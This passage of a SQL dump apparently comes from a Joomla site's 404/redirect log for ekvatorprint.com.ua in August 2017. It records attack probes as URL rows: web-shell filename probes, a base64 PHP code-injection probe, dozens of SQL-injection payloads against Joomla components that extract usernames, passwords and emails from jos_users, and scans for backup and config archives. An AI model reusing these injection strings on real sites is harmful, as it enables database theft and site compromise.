00:00:00',301),(10336,'http://ekvatorprint.com.ua/images/tmp.php.suspected',NULL,'http://ekvatorprint.com.ua/images/tmp.php.suspected','',1,0,'2017-08-04 16:03:42','0000-00-00 00:00:00',301),(10337,'http://ekvatorprint.com.ua/language/includes.php.suspected',NULL,'http://ekvatorprint.com.ua/language/includes.php.suspected','',1,0,'2017-08-04 16:04:19','0000-00-00 00:00:00',301),(10338,'http://ekvatorprint.com.ua/includes/database.cfg.php.suspected',NULL,'http://ekvatorprint.com.ua/includes/database.cfg.php.suspected','',1,0,'2017-08-04 16:07:26','0000-00-00 00:00:00',301),(10339,'http://ekvatorprint.com.ua/components/com_weblinks/models/setup.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/models/setup.php.suspected','',3,0,'2017-08-04 17:14:59','0000-00-00 00:00:00',301),(10340,'http://ekvatorprint.com.ua/administrator/ini.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/ini.php.suspected','',1,0,'2017-08-04 17:18:05','0000-00-00 00:00:00',301),(10341,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/tmpl/htaccess.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/tmpl/htaccess.php.suspected','',1,0,'2017-08-04 17:18:59','0000-00-00 00:00:00',301),(10342,'http://ekvatorprint.com.ua/components/com_weblinks/links.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/links.php.suspected','',1,0,'2017-08-04 17:19:50','0000-00-00 00:00:00',301),(10343,'http://ekvatorprint.com.ua/qwerty.php.suspected',NULL,'http://ekvatorprint.com.ua/qwerty.php.suspected','',1,0,'2017-08-04 17:19:59','0000-00-00 00:00:00',301),(10344,'http://ekvatorprint.com.ua/layouts/404.php.suspected',NULL,'http://ekvatorprint.com.ua/layouts/404.php.suspected','',1,0,'2017-08-04 17:21:22','0000-00-00 00:00:00',301),(10345,'http://ekvatorprint.com.ua/images/temp.php..suspected',NULL,'http://ekvatorprint.com.ua/images/temp.php..suspected','',1,0,'2017-08-04 18:26:10','0000-00-00 00:00:00',301),(10346,'http://ekvatorprint.com.ua/includes/security.php.suspected',NULL,'http://ekvatorprint.com.ua/includes/security.php.suspected','',1,0,'2017-08-04 19:30:27','0000-00-00 00:00:00',301),(10347,'http://ekvatorprint.com.ua/administrator/cache/advanced_settings.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/cache/advanced_settings.php.suspected','',1,0,'2017-08-04 19:43:19','0000-00-00 00:00:00',301),(10348,'http://ekvatorprint.com.ua/images/cache.php.suspected',NULL,'http://ekvatorprint.com.ua/images/cache.php.suspected','',1,0,'2017-08-04 19:44:57','0000-00-00 00:00:00',301),(10349,'http://ekvatorprint.com.ua/components/com_jce/media/js/readme.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_jce/media/js/readme.php.suspected','',1,0,'2017-08-04 19:47:12','0000-00-00 00:00:00',301),(10350,'http://ekvatorprint.com.ua/includes/pathixay.php.suspected',NULL,'http://ekvatorprint.com.ua/includes/pathixay.php.suspected','',1,0,'2017-08-04 19:48:20','0000-00-00 00:00:00',301),(10351,'http://ekvatorprint.com.ua/components/com_contact/com_contact.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_contact/com_contact.php.suspected','',1,0,'2017-08-04 19:48:58','0000-00-00 00:00:00',301),(10352,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php.suspected',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php.suspected','',1,0,'2017-08-04 19:51:25','0000-00-00 00:00:00',301),(10353,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/cache/cache/langs.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/cache/cache/langs.php.suspected','',5,0,'2017-08-04 19:57:16','0000-00-00 00:00:00',301),(10354,'http://ekvatorprint.com.ua/images/jquery.php.suspected',NULL,'http://ekvatorprint.com.ua/images/jquery.php.suspected','',1,0,'2017-08-04 21:04:28','0000-00-00 00:00:00',301),(10355,'http://ekvatorprint.com.ua/images/wso.php.suspected',NULL,'http://ekvatorprint.com.ua/images/wso.php.suspected','',1,0,'2017-08-04 22:03:15','0000-00-00 00:00:00',301),(10356,'http://ekvatorprint.com.ua/components/com_hello/hello.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_hello/hello.php.suspected','',2,0,'2017-08-04 22:11:00','0000-00-00 00:00:00',301),(10357,'http://ekvatorprint.com.ua/images/index.php.suspected',NULL,'http://ekvatorprint.com.ua/images/index.php.suspected','',1,0,'2017-08-04 22:16:45','0000-00-00 00:00:00',301),(10358,'http://ekvatorprint.com.ua/administrator/components/com_banners/web-infor.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/web-infor.php.suspected','',1,0,'2017-08-04 23:18:43','0000-00-00 00:00:00',301),(10359,'http://ekvatorprint.com.ua/modules/mod_araticlhess/mod_araticlhess.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/mod_araticlhess.php.suspected','',1,0,'2017-08-05 00:32:08','0000-00-00 00:00:00',301),(10360,'http://ekvatorprint.com.ua/images/404.php.suspected',NULL,'http://ekvatorprint.com.ua/images/404.php.suspected','',1,0,'2017-08-05 00:36:41','0000-00-00 00:00:00',301),(10361,'http://ekvatorprint.com.ua/error.php.suspected',NULL,'http://ekvatorprint.com.ua/error.php.suspected','',1,0,'2017-08-05 00:37:04','0000-00-00 00:00:00',301),(10362,'http://ekvatorprint.com.ua/framework.php.suspected',NULL,'http://ekvatorprint.com.ua/framework.php.suspected','',1,0,'2017-08-05 04:11:51','0000-00-00 00:00:00',301),(10363,'http://ekvatorprint.com.ua/images/legacy.cms.php.suspected',NULL,'http://ekvatorprint.com.ua/images/legacy.cms.php.suspected','',1,0,'2017-08-05 05:22:01','0000-00-00 00:00:00',301),(10364,'http://ekvatorprint.com.ua/images/modulnie kartini/',NULL,'','',1,0,'2017-08-05 12:46:22','0000-00-00 00:00:00',301),(10365,'http://ekvatorprint.com.ua/modules/mod_secure_help/mod_secure_help.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_secure_help/mod_secure_help.php.suspected','',1,0,'2017-08-05 17:15:51','0000-00-00 00:00:00',301),(10366,'http://ekvatorprint.com.ua/modules/mod_joomlasec/mod_joomlasec.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_joomlasec/mod_joomlasec.php.suspected','',1,0,'2017-08-05 17:17:28','0000-00-00 00:00:00',301),(10367,'http://ekvatorprint.com.ua/templates/beez3/index.php.suspected',NULL,'http://ekvatorprint.com.ua/templates/beez3/index.php.suspected','',1,0,'2017-08-05 17:18:31','0000-00-00 00:00:00',301),(10368,'http://ekvatorprint.com.ua/modules/mod_system.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_system.php.suspected','',1,0,'2017-08-05 17:23:05','0000-00-00 00:00:00',301),(10369,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/archives.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/archives.php.suspected','',1,0,'2017-08-05 18:23:10','0000-00-00 00:00:00',301),(10370,'http://ekvatorprint.com.ua/modules/mod_araticlws/mod_araticlws.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlws/mod_araticlws.php.suspected','',1,0,'2017-08-05 18:26:53','0000-00-00 00:00:00',301),(10371,'http://ekvatorprint.com.ua/plugins/content/apismtp/ini.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/content/apismtp/ini.php.suspected','',4,0,'2017-08-05 19:27:00','0000-00-00 00:00:00',301),(10372,'http://ekvatorprint.com.ua/modules/mod_ariimagesws/mod_ariimagesws.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimagesws/mod_ariimagesws.php.suspected','',1,0,'2017-08-05 19:30:11','0000-00-00 00:00:00',301),(10373,'http://ekvatorprint.com.ua/modules/mod_backup2/mod_backup2.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_backup2/mod_backup2.php.suspected','',1,0,'2017-08-05 19:49:43','0000-00-00 00:00:00',301),(10374,'http://ekvatorprint.com.ua/modules/mod_bing/mod_bing.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_bing/mod_bing.php.suspected','',1,0,'2017-08-05 20:31:00','0000-00-00 00:00:00',301),(10375,'http://ekvatorprint.com.ua/modules/mod_araticllws/mod_araticllws.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_araticllws/mod_araticllws.php.suspected','',1,0,'2017-08-06 01:10:15','0000-00-00 00:00:00',301),(10376,'http://ekvatorprint.com.ua/modules/mod_widget/mod_widget.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_widget/mod_widget.php.suspected','',1,0,'2017-08-06 01:56:09','0000-00-00 00:00:00',301),(10377,'http://ekvatorprint.com.ua/tmp/cacheplugin.php.suspected',NULL,'http://ekvatorprint.com.ua/tmp/cacheplugin.php.suspected','',1,0,'2017-08-06 01:57:40','0000-00-00 00:00:00',301),(10378,'http://ekvatorprint.com.ua/modules/mod_mapsapi/mod_mapsapi.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_mapsapi/mod_mapsapi.php.suspected','',1,0,'2017-08-06 17:50:58','0000-00-00 00:00:00',301),(10379,'http://ekvatorprint.com.ua/modules/mod_search/tmpl/newfile.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_search/tmpl/newfile.php.suspected','',1,0,'2017-08-06 18:47:26','0000-00-00 00:00:00',301),(10380,'http://ekvatorprint.com.ua/modules/mod_articless/mod_articless.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/mod_articless.php.suspected','',1,0,'2017-08-06 18:49:22','0000-00-00 00:00:00',301),(10381,'http://ekvatorprint.com.ua/tmp/s.php.suspected',NULL,'http://ekvatorprint.com.ua/tmp/s.php.suspected','',1,0,'2017-08-06 18:52:06','0000-00-00 00:00:00',301),(10382,'http://ekvatorprint.com.ua/modules/mod_cmscore/mod_cmscore.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_cmscore/mod_cmscore.php.suspected','',1,0,'2017-08-06 18:53:50','0000-00-00 00:00:00',301),(10383,'http://ekvatorprint.com.ua/modules/mod_system/mod_system.php.suspected',NULL,'http://ekvatorprint.com.ua/modules/mod_system/mod_system.php.suspected','',1,0,'2017-08-06 20:46:51','0000-00-00 00:00:00',301),(10384,'http://ekvatorprint.com.ua/templates/atomic/index.php.suspected',NULL,'http://ekvatorprint.com.ua/templates/atomic/index.php.suspected','',1,0,'2017-08-06 20:47:12','0000-00-00 00:00:00',301),(10385,'http://ekvatorprint.com.ua/tmp/system.php.suspect',NULL,'http://ekvatorprint.com.ua/tmp/system.php.suspect','',1,0,'2017-08-06 22:07:21','0000-00-00 00:00:00',301),(10386,'http://ekvatorprint.com.ua/plugins/system/anticopy.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy.php.suspected','',1,0,'2017-08-06 22:47:18','0000-00-00 00:00:00',301),(10387,'http://ekvatorprint.com.ua/modules/mod_servises/system.php',NULL,'http://ekvatorprint.com.ua/modules/mod_servises/system.php','',1,0,'2017-08-07 06:58:12','0000-00-00 00:00:00',301),(10388,'http://ekvatorprint.com.ua/wp-content/plugins/wp-homepage-slideshow/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-homepage-slideshow/readme.txt','',3,0,'2017-08-07 17:29:19','0000-00-00 00:00:00',301),(10389,'http://ekvatorprint.com.ua/meniacle/wp-blog-header.php',NULL,'','',3,0,'2017-08-07 18:08:56','0000-00-00 00:00:00',301),(10390,'http://ekvatorprint.com.ua/images/jmails.php?u',NULL,'http://ekvatorprint.com.ua/images/jmails.php?u','',1,0,'2017-08-07 18:30:13','0000-00-00 00:00:00',301),(10391,'http://ekvatorprint.com.ua/forum/',NULL,'http://ekvatorprint.com.ua/','',3,0,'2017-08-07 22:00:13','0000-00-00 00:00:00',301),(10392,'http://ekvatorprint.com.ua/components/com_content/mods.php.suspected',NULL,'http://ekvatorprint.com.ua/components/com_content/mods.php.suspected','',2,0,'2017-08-08 16:13:05','0000-00-00 00:00:00',301),(10393,'http://ekvatorprint.com.ua/administrator/components/com_banners/banners.html.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/banners.html.php.suspected','',1,0,'2017-08-08 16:16:33','0000-00-00 00:00:00',301),(10394,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/jproicaptcha.php.suspected',NULL,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/jproicaptcha.php.suspected','',1,0,'2017-08-08 17:28:32','0000-00-00 00:00:00',301),(10395,'http://ekvatorprint.com.ua/site/wp-admin/setup-config.php',NULL,'','',6,0,'2017-08-08 18:28:47','0000-00-00 00:00:00',301),(10396,'http://ekvatorprint.com.ua/prv8.php',NULL,'','',3,0,'2017-08-09 17:16:02','0000-00-00 00:00:00',301),(10397,'http://ekvatorprint.com.ua/administrator/templates/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/templates/logo_img.php.suspected','',2,0,'2017-08-11 15:07:34','0000-00-00 00:00:00',301),(10398,'http://ekvatorprint.com.ua/administrator/components/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/components/logo_img.php.suspected','',1,0,'2017-08-12 07:45:25','0000-00-00 00:00:00',301),(10399,'http://ekvatorprint.com.ua/.index.php?xo=echo(base64_decode(\'YWR6b250aWxvc2E=\'));',NULL,'','',1,0,'2017-08-13 07:10:57','0000-00-00 00:00:00',301),(10400,'http://ekvatorprint.com.ua/cache/.index.php?xo=echo(base64_decode(\'YWR6b250aWxvc2E=\'));',NULL,'','',1,0,'2017-08-13 07:11:26','0000-00-00 00:00:00',301),(10401,'http://ekvatorprint.com.ua/plugins/system/.index.php?xo=echo(base64_decode(\'YWR6b250aWxvc2E=\'));',NULL,'','',1,0,'2017-08-13 07:11:45','0000-00-00 00:00:00',301),(10402,'http://ekvatorprint.com.ua/index.php?option=com_jobline&task=results&Itemid=&search=%\' and  (select 1 from((select count(*),concat(0x247e7e7e24,user(),0x2a2a2a,database(),0x247e7e7e24,floor(rand(0)*2))x from information_schema.tables group by x)y))>1 and \'%\'=\'',NULL,'','',1,0,'2017-08-15 05:43:13','0000-00-00 00:00:00',301),(10403,'http://ekvatorprint.com.ua/index.php?option=com_idoblog&task=profile&Itemid=&userid=-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)',NULL,'','',2,0,'2017-08-15 05:43:13','0000-00-00 00:00:00',301),(10404,'http://ekvatorprint.com.ua/index.php?option=com_opencart&route=product/product&product_id=%1\' /*!50000and*/ 1=(/*!50000updatexml*/(0x3a,/*!50000concat*/(1,0x7e7e7e,user(),0x7e7e7e),1))-- -',NULL,'','',1,0,'2017-08-15 05:43:13','0000-00-00 00:00:00',301),(10405,'http://ekvatorprint.com.ua/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(CHAR(36, 126, 126, 126, 36),username,CHAR(42, 42, 42),password,CHAR(42, 42, 42),email,CHAR(36, 126, 126, 126, 36))/**/from/**/jos_users--',NULL,'','',3,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10406,'http://ekvatorprint.com.ua/index.php?option=com_blog_calendar&modid=1 OR 1 GROUP BY CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2)) HAVING MIN(0) -- vDZN',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10407,'http://ekvatorprint.com.ua/index.php?option=com_timereturns&view=timereturns&id=1\' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'YLvB\'=\'YLvB',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10408,'http://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=%\' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;',NULL,'','',3,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10409,'http://ekvatorprint.com.ua/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password,0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--',NULL,'','',2,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10410,'http://ekvatorprint.com.ua/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132',NULL,'','',2,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10411,'http://ekvatorprint.com.ua/index.php?option=com_lexikon&id=-1 union select 1,concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),3 from mos_users limit 0,1--+',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10412,'http://ekvatorprint.com.ua/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 or (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--',NULL,'','',2,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10413,'http://ekvatorprint.com.ua/index.php?option=com_rpl&view=propertyshow&pid=1 OR 1 GROUP BY CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2)) HAVING MIN(0) -- vDZN',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10414,'http://ekvatorprint.com.ua/index.php?option=com_estateagent&act=cat&task=showCE&id=1  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -',NULL,'','',2,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10415,'http://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1-- -',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10416,'http://ekvatorprint.com.ua/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1 and 1=0 union select 1,concat(0x247e7e7e24,version(),0x2a2a2a,user(),0x247e7e7e24)+--+D4NB4R',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10417,'http://ekvatorprint.com.ua/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x7e7e7e,version(),0x7e7e7e,0x3a)),0)--+-',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10418,'http://ekvatorprint.com.ua/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1\' UNION ALL SELECT 1,2,3,4,5,concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),NULL,NULL,NULL,NULL,NULL,NULL,NULL from jos_users#',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10419,'http://ekvatorprint.com.ua/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- umHw',NULL,'','',1,0,'2017-08-15 05:43:14','0000-00-00 00:00:00',301),(10420,'http://ekvatorprint.com.ua/index.php?option=com_winners&view=winner_detail&Itemid=683&id=156 union select CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24)-- -',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10421,'http://ekvatorprint.com.ua/index.php?option=com_extrasearch&view=details&listing_id=15&Itemid=662&establename=themes where 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10422,'http://ekvatorprint.com.ua/index.php?option=com_simplephotogallery&view=images&albumid=1 or 1=2 union select NULL,NULL,CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10423,'http://ekvatorprint.com.ua/index.php?option=com_eventbooking&view=calendar&layout=weekly&date=2016-11-11 00:00:00\' and \'2014-11-11 00:00:00\') UNION SELECT 1,2,3,4,CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53-- -',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10424,'http://ekvatorprint.com.ua/index.php?option=com_recipe&view=recipes&task=print_ingred&id=1\' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10425,'http://ekvatorprint.com.ua/index.php?option=com_contactformmaker&view=contactformmaker&id=1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10426,'http://ekvatorprint.com.ua/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=1',NULL,'','',1,0,'2017-08-15 05:43:15','0000-00-00 00:00:00',301),(10427,'http://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--',NULL,'','',1,0,'2017-08-15 05:43:16','0000-00-00 00:00:00',301),(10428,'http://ekvatorprint.com.ua/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=-1 union select 1,unhex(hex(concat(0x247e7e7e24,username,0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24))),3 from jos_users limit 0,1',NULL,'','',1,0,'2017-08-15 05:43:16','0000-00-00 00:00:00',301),(10429,'http://ekvatorprint.com.ua/index.php?option=com_jcart&route=product/product&product_id=%1\' /*!50000and*/ 1=(/*!50000updatexml*/(0x3a,/*!50000concat*/(1,0x7e7e7e,version(),0x7e7e7e),1))-- -',NULL,'','',1,0,'2017-08-15 05:43:16','0000-00-00 00:00:00',301),(10430,'http://ekvatorprint.com.ua/components/com_videogallerylite/ajax_url.php',NULL,'','',1,0,'2017-08-15 05:43:23','0000-00-00 00:00:00',301),(10431,'http://ekvatorprint.com.ua/ekvatorprint.bck',NULL,'','',2,0,'2017-08-16 17:16:51','0000-00-00 00:00:00',301),(10432,'http://ekvatorprint.com.ua/configuration.php.bck',NULL,'','',2,0,'2017-08-16 17:16:54','0000-00-00 00:00:00',301),(10433,'http://ekvatorprint.com.ua/bck.sql',NULL,'','',2,0,'2017-08-16 17:17:00','0000-00-00 00:00:00',301),(10434,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bck.sql',NULL,'','',2,0,'2017-08-16 17:17:00','0000-00-00 00:00:00',301),(10435,'http://ekvatorprint.com.ua/ekvatorprint.bck.sql',NULL,'','',2,0,'2017-08-16 17:17:01','0000-00-00 00:00:00',301),(10436,'http://ekvatorprint.com.ua/backup.bkp',NULL,'','',2,0,'2017-08-16 17:17:10','0000-00-00 00:00:00',301),(10437,'http://ekvatorprint.com.ua/backup.bkup',NULL,'','',2,0,'2017-08-16 17:17:10','0000-00-00 00:00:00',301),(10438,'http://ekvatorprint.com.ua/backup.psc',NULL,'','',2,0,'2017-08-16 17:17:10','0000-00-00 00:00:00',301),(10439,'http://ekvatorprint.com.ua/backup.npb',NULL,'','',2,0,'2017-08-16 17:17:11','0000-00-00 00:00:00',301),(10440,'http://ekvatorprint.com.ua/backup.ibz',NULL,'','',2,0,'2017-08-16 17:17:11','0000-00-00 00:00:00',301),(10441,'http://ekvatorprint.com.ua/backup.backup',NULL,'','',2,0,'2017-08-16 17:17:11','0000-00-00 00:00:00',301),(10442,'http://ekvatorprint.com.ua/dump.bck',NULL,'','',2,0,'2017-08-16 17:17:12','0000-00-00 00:00:00',301),(10443,'http://ekvatorprint.com.ua/dump.sql.bck',NULL,'','',2,0,'2017-08-16 17:17:13','0000-00-00 00:00:00',301),(10444,'http://ekvatorprint.com.ua/home.bck',NULL,'','',2,0,'2017-08-16 17:17:15','0000-00-00 00:00:00',301),(10445,'http://ekvatorprint.com.ua/htodcs.bck',NULL,'','',1,0,'2017-08-16 17:17:15','0000-00-00 00:00:00',301),(10446,'http://ekvatorprint.com.ua/public_html.bck',NULL,'','',2,0,'2017-08-16 17:17:18','0000-00-00 00:00:00',301),(10447,'http://ekvatorprint.com.ua/site.bck',NULL,'','',2,0,'2017-08-16 17:17:22','0000-00-00 00:00:00',301),(10448,'http://ekvatorprint.com.ua/web.bck',NULL,'','',2,0,'2017-08-16 17:17:23','0000-00-00 00:00:00',301),(10449,'http://ekvatorprint.com.ua/www.bck',NULL,'','',2,0,'2017-08-16 17:17:25','0000-00-00 00:00:00',301),(10450,'http://ekvatorprint.com.ua/www.ekvatorprint.com.ua.bck',NULL,'','',2,0,'2017-08-16 17:17:27','0000-00-00 00:00:00',301),(10451,'http://ekvatorprint.com.ua/www.ekvatorprint.bck',NULL,'','',1,0,'2017-08-16 17:17:29','0000-00-00 00:00:00',301),(10452,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bck',NULL,'','',2,0,'2017-08-16 17:17:30','0000-00-00 00:00:00',301),(10453,'http://ekvatorprint.com.ua/ekvatorprint.gz',NULL,'','',2,0,'2017-08-16 17:17:31','0000-00-00 00:00:00',301),(10454,'http://ekvatorprint.com.ua/ekvatorprint.rar',NULL,'','',3,0,'2017-08-16 17:17:31','0000-00-00 00:00:00',301),(10455,'http://ekvatorprint.com.ua/ekvatorprint.tar',NULL,'','',3,0,'2017-08-16 17:17:31','0000-00-00 00:00:00',301),(10456,'http://ekvatorprint.com.ua/ekvatorprint.tar.gz',NULL,'','',3,0,'2017-08-16 17:17:32','0000-00-00 00:00:00',301),(10457,'http://ekvatorprint.com.ua/ekvatorprint.tgz',NULL,'','',2,0,'2017-08-16 17:17:32','0000-00-00 00:00:00',301),(10458,'http://ekvatorprint.com.ua/ekvatorprint_backup.gz',NULL,'','',2,0,'2017-08-16 17:17:32','0000-00-00 00:00:00',301),(10459,'http://ekvatorprint.com.ua/ekvatorprint_backup.rar',NULL,'','',2,0,'2017-08-16 17:17:32','0000-00-00 00:00:00',301),(10460,'http://ekvatorprint.com.ua/ekvatorprint_backup.sql',NULL,'','',3,0,'2017-08-16 17:17:32','0000-00-00 00:00:00',301),(10461,'http://ekvatorprint.com.ua/ekvatorprint_backup.sql.gz',NULL,'','',3,0,'2017-08-16 17:17:33','0000-00-00 00:00:00',301),(10462,'http://ekvatorprint.com.ua/ekvatorprint_backup.tgz',NULL,'','',2,0,'2017-08-16 17:17:33','0000-00-00 00:00:00',301),(10463,'http://ekvatorprint.com.ua/ekvatorprint_backup.bck',NULL,'','',2,0,'2017-08-16 17:17:33','0000-00-00 00:00:00',301),(10464,'http://ekvatorprint.com.ua/localhost-ekvatorprint-data.7z',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 00:00:00',301),(10465,'http://ekvatorprint.com.ua/localhost-ekvatorprint-data.bck',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 00:00:00',301),(10466,'http://ekvatorprint.com.ua/localhost-ekvatorprint.com.ua-data.7z',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 00:00:00',301),(10467,'http://ekvatorprint.com.ua/localhost-ekvatorprint.com.ua-data.bck',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 00:00:00',301),(10468,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_MySQL.sql',NULL,'','',2,0,'2017-08-16 17:17:34','0000-00-00 